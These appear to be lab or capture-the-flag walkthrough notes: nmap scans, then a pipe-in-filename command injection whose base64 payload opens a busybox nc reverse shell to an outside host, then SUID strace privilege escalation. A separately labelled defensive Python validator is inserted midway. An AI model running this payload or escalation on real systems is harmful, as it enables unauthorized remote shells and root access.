Date: Mar 23, 2025 → Mar 23, 2025
Tags: Nmap, Privilege Escalation Techniques, Web Exploitation
192.168.140.178
Nmap
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 05:57 EDT
Nmap scan report for 192.168.140.178
Host is up (0.070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 05:57 EDT
Warning: 192.168.140.178 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.140.178
Host is up (0.066s latency).
All 65535 scanned ports on 192.168.140.178 are in ignored states.
Not shown: 65385 open|filtered udp ports (no-response), 150 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 144.92 seconds
80


nothing found via brute force

We found a script that could be used, but it is a Metasploit module, so we need to understand how this vulnerability works via the link below.
Put simply, we need to give an image a file name that includes |, and the command after the | will be run.
cp pngegg.png '|abc"echo YnVzeWJveCBuYyAxOTIuMTY4LjQ1LjE3NSA0NDQ0IC1lIC9iaW4vYmFzaA== | base64 -d | bash".jpg'


into that machine
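The fix for this class of bug, as an added example that is not part of the original notes: the upload handler never lets the client-supplied file name reach the image tool or a shell, and it records names that carry a pipe or other shell metacharacters as a detection signal. The function names, the extension allowlist and the sample names are assumptions made for illustration; the second sample only mirrors the shape of the file name above, with the payload replaced by a placeholder.

```python
import os
import re
import secrets

# Assumed allowlist for an image upload feature (not taken from the target application).
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
# Characters that a shell, or a tool that opens "|name" as a pipe, treats specially.
SHELL_META = re.compile(r"[|;&$`\"'<>(){}\\\n\r]")


def _ext(original):
    """Lower-cased extension of the last path component."""
    base = os.path.basename(original.replace("\\", "/"))
    return os.path.splitext(base)[1].lower()


def inspect_upload_name(original):
    """Return the reasons a client-supplied file name should raise an alert."""
    reasons = []
    if os.path.basename(original.replace("\\", "/")) != original:
        reasons.append("path-separator")
    if SHELL_META.search(original):
        reasons.append("shell-metacharacter")
    if original.lstrip().startswith("|"):
        reasons.append("leading-pipe")
    if _ext(original) not in ALLOWED_EXT:
        reasons.append("extension-not-allowed")
    return reasons


def storage_name(original):
    """On-disk name: random stem plus allowlisted extension, never the client's name."""
    ext = _ext(original)
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    return secrets.token_hex(16) + ext


# Constructed sample names; PLACEHOLDER stands in for the encoded command.
SAMPLES = [
    "pngegg.png",
    '|abc"echo PLACEHOLDER | base64 -d | bash".jpg',
    "../../etc/passwd",
]

if __name__ == "__main__":
    for name in SAMPLES:
        print(repr(name), "->", inspect_upload_name(name) or "clean")
```

Because the stored name is generated server-side, whatever later processes the file sees only hex characters and a known extension; the reasons list is for logging and alerting, not for sanitising the name.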
PE
We need to check whether the strace binary has the SUID bit set.
Use:
ls -alh /usr/bin/strace

strace -o /dev/null /bin/sh -p

got it